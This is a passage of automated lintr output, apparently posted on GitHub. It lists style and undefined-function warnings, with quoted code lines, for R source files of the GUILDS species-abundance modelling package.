^~\n```\n[R/Condition.R:153:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L153) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:158:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L158) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:159:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L159) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\") {\n    ^\n```\n[R/Condition.R:162:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L162) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:163:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L163) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0 ||\n    ^\n```\n[R/Condition.R:167:18:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L167) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                ~^~\n```\n[R/Condition.R:167:19:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L167) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                  ^\n```\n[R/Condition.R:168:13:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L168) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n           ~^~\n```\n[R/Condition.R:168:14:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L168) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n             ^\n```\n[R/Condition.R:168:16:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L168) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n              ~^~\n```\n[R/Condition.R:168:17:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L168) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n                ^\n```\n[R/Condition.R:170:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L170) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:171:9:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L171) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J, \n        ^~~~~~~~~~~~\n```\n[R/Condition.R:171:60:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L171) *style:* **Trailing whitespace is superfluous.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J, \n                                                           ^\n```\n[R/Condition.R:174:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L174) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:175:14:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:14:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L175) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L180) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L180) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:46:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n                                             ^~~~~~~~\n```\n[R/Condition.R:181:53:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L181) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                             method, \n                                                    ^\n```\n[R/Condition.R:184:12:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L184) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:184:12:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L184) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:185:12:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L185) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:185:12:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L185) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:186:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:189:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L189) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:length(x)) freq_x[i] <- x[[i]]\n     ^\n```\n[R/Condition.R:190:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L190) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:191:14:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L191) *style:* **Use <-, not =, for assignment.**\n```r\n​  prefactor1 = -( sum(log(SADX)) + sum(lgamma(1 + freq_x)) )\n             ^\n```\n[R/Condition.R:191:17:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L191) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor1 = -( sum(log(SADX)) + sum(lgamma(1 + freq_x)) )\n                ^\n```\n[R/Condition.R:192:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L192) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:195:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L195) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:length(x2)) freq_y[i] <- x2[[i]]\n     ^\n```\n[R/Condition.R:196:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L196) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:197:14:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L197) *style:* **Use <-, not =, for assignment.**\n```r\n​  prefactor2 = -( sum(log(SADY)) + sum(lgamma(1 + freq_y)) )\n             ^\n```\n[R/Condition.R:197:17:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L197) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor2 = -( sum(log(SADY)) + sum(lgamma(1 + freq_y)) )\n                ^\n```\n[R/Condition.R:199:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L199) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sx = length(SADX)\n     ^\n```\n[R/Condition.R:200:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L200) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sy = length(SADY)\n     ^\n```\n[R/Condition.R:201:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L201) *style:* **Use <-, not =, for assignment.**\n```r\n​  Nx = sum(SADX)\n     ^\n```\n[R/Condition.R:202:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L202) *style:* **Use <-, not =, for assignment.**\n```r\n​  Ny = sum(SADY)\n     ^\n```\n[R/Condition.R:203:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L203) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = Nx + Ny\n    ^\n```\n[R/Condition.R:206:17:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L206) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:211:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L211) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:213:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L213) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(method == \"simplex\") {\n    ^\n```\n[R/Condition.R:214:10:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L214) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(initVals, g, verbose)\n         ^~~~~~~\n```\n[R/Condition.R:214:18:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​    x <- simplex(initVals, g, verbose)\n                 ^~~~~~~~\n```\n[R/Condition.R:215:4:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L215) *style:* **Trailing whitespace is superfluous.**\n```r\n​  } \n   ^\n```\n[R/Condition.R:216:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L216) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(method == \"subplex\") {\n    ^\n```\n[R/Condition.R:217:7:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L217) *warning:* **no visible global function definition for ‘subplex’**\n```r\n​\tx <- subplex(initVals, g)\n      ^~~~~~~\n```\n[R/Condition.R:217:11:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L217) *style:* **Put spaces around all infix operators.**\n```r\n​\tx <- subplex(initVals, g)\n         ~^~~\n```\n[R/Condition.R:217:22:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​\tx <- subplex(initVals, g)\n                     ^~~~~~~~\n```\n[R/drawLocal.R:1:23:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L1) *style:* **Commas should always have a space after.**\n```r\n​pm_sad <- function(th,I,j) {\n                      ^\n```\n[R/drawLocal.R:1:25:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L1) *style:* **Commas should always have a space after.**\n```r\n​pm_sad <- function(th,I,j) {\n                        ^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L3) *style:* **lines should not be more than 80 characters.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n^\n```\n[R/drawLocal.R:3:12:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L3) *style:* **Use <-, not =, for assignment.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n           ^\n```\n[R/drawLocal.R:3:12:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n          ~^~\n```\n[R/drawLocal.R:3:29:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                           ~^~\n```\n[R/drawLocal.R:3:43:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                         ~^~\n```\n[R/drawLocal.R:3:50:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                                ~^\n```\n[R/drawLocal.R:3:57:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L3) *style:* **Commented code should be removed.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                                        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx0=which(x==0);\n^\n```\n[R/drawLocal.R:4:12:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L4) *style:* **Use <-, not =, for assignment.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n           ^\n```\n[R/drawLocal.R:4:12:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L4) *style:* **Put spaces around all infix operators.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n          ~^~\n```\n[R/drawLocal.R:4:25:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n                        ^~~~~~~~\n```\n[R/drawLocal.R:4:36:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L4) *style:* **Commented code should be removed.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n                                   ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(cnt in 1:length(k1)) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx0)) {\n^\n```\n[R/drawLocal.R:5:12:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(cnt in 1:length(k1)) {\n           ^\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tk = k1[cnt];\n^~\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n^~\n```\n[R/drawLocal.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L6) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tk = k1[cnt];\n                  ^\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~~\n```\n[R/drawLocal.R:7:19:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n^~~\n```\n[R/drawLocal.R:8:16:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n               ^~~~~~~~~\n```\n[R/drawLocal.R:8:35:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n                                 ~^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty[idx0] = aux;\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n                     ^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n                    ~^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx1=which(x==1);\n^\n```\n[R/drawLocal.R:11:10:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n         ^~~~~~~~~\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n                     ^\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n                    ~^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx1)) {\n^\n```\n[R/drawLocal.R:12:8:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n       ^~~~~~~~~\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L12) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n                   ^\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n                  ~^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tif(ymax<(y0+1)) {\n^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n^~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin = 0;\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = -Inf;\n^~~\n```\n[R/drawLocal.R:14:30:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\txmin = 0;\n                             ^\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tf <- function(x) {\n^~~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      y[idx1] = 